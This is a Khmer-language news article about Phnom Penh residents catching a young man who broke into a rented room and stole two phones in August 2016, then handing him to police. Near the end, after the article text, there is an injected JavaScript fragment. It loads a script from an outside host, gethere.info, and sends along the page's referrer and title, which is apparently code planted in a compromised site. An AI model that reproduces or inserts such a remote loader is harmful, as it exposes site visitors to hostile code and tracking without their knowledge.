(Video) ពលរដ្ឋចាប់ចោរគាស់ប្រគល់អោយនគរបាលប៉ុស្តិ៍ភ្នំពេញថ្មីយកស្នាដៃ

ភ្នំពេញ៖ ជនសង្ស័យម្នាក់ត្រូវបានប្រជាពលរដ្ឋឃាត់ខ្លួនប្រគល់អោយសមត្ថកិច្ច ខណៈធ្វើសកម្មភាពគាស់បន្ទប់ ជួលប្រជាពលរដ្ឋបានសម្រេច

តែគេចខ្លួនមិនរួចត្រូវបានប្រជាពលរដ្ឋឃាត់ខ្លួនអោយសមត្ថកិច្ច។  ករណីនេះបង្កការភ្ញាក់ផ្អើលកាលពីម៉ោងព្រឹកថ្ងៃទី ២២ ខែសីហាឆ្នាំ ២០១៦ នៅចំនុចផ្ទះជួលដីដីឡូត៍លេខ៣៣ ផ្លូវ ២០០០ ក្រុម៦ ភូមិភ្នំពេញថ្មី សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ រាជធានីភ្នំពេញ។

ជនសង្ស័យមានឈ្មោះ ថាច់ ឌី អាយុ ២៣ឆ្នាំ មុខរបរកម្មករសំណង់ ស្នាក់នៅភូមិជ្រេស សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ មានស្រុកកំណើត នៅខ្មែរកម្ពុជាក្រោម។ ចំណែកជនរងគ្រោះមានឈ្មោះ ប៊ុត ធា ភេទស្រី អាយុ ២០ ស្នាក់នៅទីតាំងកើតហេតុខាងលើ ។

ប្រភពពីប្រជាពលរដ្ឋនៅកន្លែងកើតហេតយថា មុនពេលកើតហេតុជនសង្ស័យខាងលើបានជិះម៉ូតូសេ ១ យកក១០ ព័ណ៌ខ្មៅ ស្លាកលេខ 1CN-8293  យកទៅចតទុកចោលនៅខាងលិចផ្ទះជួលរួចបានឡើងទៅជាន់ទី១ ធ្វើសកម្មភាពគាស់បន្ទប់ជួលលេច៤ លួចទូរស័ព្ទដៃ២គ្រឿង ខណៈលួចបានហើយ ត្រូវបានប្រជាពលរដ្ឋឃើញ ចាប់ឃាត់ខ្លួនប្រគល់អោយសត្ថកិច្ចតែម្តង។

ប្រភពដដែលបានប្រាប់ទៀតថា ទីតាំងខាងលើមានករណីគាស់បន្ទប់យកទ្រព្យសម្បត្តិជាញ៉ឹកញាប់ ប៉ុន្តែមិនដែលចាប់បានជនស្ស័យឡើយ ទើបព្រឹកម៉ិញនេះ ប្រជាពលរដ្ឋតាមទាន់ចាប់ប្រគល់អោយសមត្ថកិច្ចតែម្តង ។

បច្ចុប្បន្នជនសង្ស័យខាងលើ ត្រូវបាននាំខ្លួនទៅសាកសួរនៅប៉ុស្តិ៍ភ្នំពេញថ្មី កសាងសំណុំរឿងបញ្ជូនទៅអធិការដ្ឋានខណ្ឌសែនសុខចាត់ការបន្តតាមនិតិវិធី។

9fbbefa0-3cf4-4093-a68c-0be862426fa2s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More